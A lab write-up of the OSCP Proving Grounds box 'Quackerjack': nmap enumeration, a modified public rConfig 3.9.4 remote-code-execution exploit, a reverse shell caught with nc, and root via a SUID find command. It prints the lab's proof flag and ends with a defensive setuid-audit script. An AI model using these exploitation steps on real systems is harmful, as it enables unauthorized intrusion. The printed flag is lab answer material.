OSCP - Proving Grounds - Quackerjack

Key takeaways

  • Port forwarding

Steps

I ran an nmap scan, and a lot of ports are open. I tried 80 and 8081 first; 8081 looks the more interesting one.

Nmap scan report for 192.168.51.57
Host is up (0.0011s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.49.51
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
|   256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
|_  256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open  mysql       MariaDB (unauthorized)
8081/tcp open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: 400 Bad Request

Visiting port 8081 shows rConfig 3.9.4 running.

Searching for an exploit turned up "rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution - PHP webapps Exploit". The exploit needs a small change: add the verify=False parameter when it sends its requests, otherwise it errors out on the self-signed certificate. Even so, it still fails at the step shown below, but at least the admin user gets created, so I removed the code at the end of the exploit that deletes the admin user and kept the admin access.

[+] Adding a temporary admin user...
[+] Authenticating as pxaovedjzi...
[+] Logged in successfully, triggering the payload...
[+] Check your listener !
[-] The command was not executed by the target or you forgot to open a listener...
[+] Removing the temporary admin user...
[+] Done.

Further searching turned up https://gist.github.com/farid007/9f6ad063645d5b1550298c8b9ae953ff

It appears the same admin + file upload vulnerability is present; using it gives a reverse shell.

C:\home\kali\Documents\OFFSEC\GoToWork\Quackerjack> nc -nlvp 80  
listening on [any] 80 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.162.57] 47790
Linux quackerjack 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 11:04:35 up 13 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$
sh-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)

Further enumeration shows that /usr/bin/find has the SUID bit set. Using it directly gives root.

bash-4.2$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/find
......
......
/usr/libexec/dbus-1/dbus-daemon-launch-helper
bash-4.2$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
sh-4.2# id
id
uid=48(apache) gid=48(apache) euid=0(root) groups=48(apache)
sh-4.2# cat /root/proof.txt
cat /root/proof.txt
307a236503d332668cdf2eb1fd38c2f1
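As an added defensive counterpart to the SUID step above (example code, not part of the original write-up): a POSIX shell audit that lists setuid files under a root and reports any that are absent from a baseline allowlist, so a stray setuid bit like the one on /usr/bin/find on this box shows up. The baseline entries are an assumption; replace them with the list taken from a known-good build of your own host.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit setuid binaries against
# a baseline so an unexpected bit (like the one on /usr/bin/find on this box)
# is reported. Remediation for a flagged file is `chmod u-s <file>`.

# Baseline of setuid files expected on the host, one per line. ASSUMPTION:
# illustrative CentOS 7 entries; replace with the list from a known-good build.
SUID_BASELINE='/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount
/usr/libexec/dbus-1/dbus-daemon-launch-helper'

# list_suid ROOT: print regular files under ROOT with the setuid bit set,
# staying on one filesystem and sorted so two runs can be diffed.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# unexpected_suid ROOT: print setuid files under ROOT that are absent from
# SUID_BASELINE. Paths are compared relative to ROOT so the same baseline
# works for a live system ("/") and for a mounted image or chroot.
unexpected_suid() {
    root=${1%/}                  # "/" becomes "", "/mnt/img/" becomes "/mnt/img"
    list_suid "$1" | while IFS= read -r f; do
        rel=${f#"$root"}         # strip the root prefix, keep the leading "/"
        printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$rel" || printf '%s\n' "$f"
    done
}

# Usage on a live host: unexpected_suid /
# Every printed line is a finding; empty output means the host matches the baseline.
```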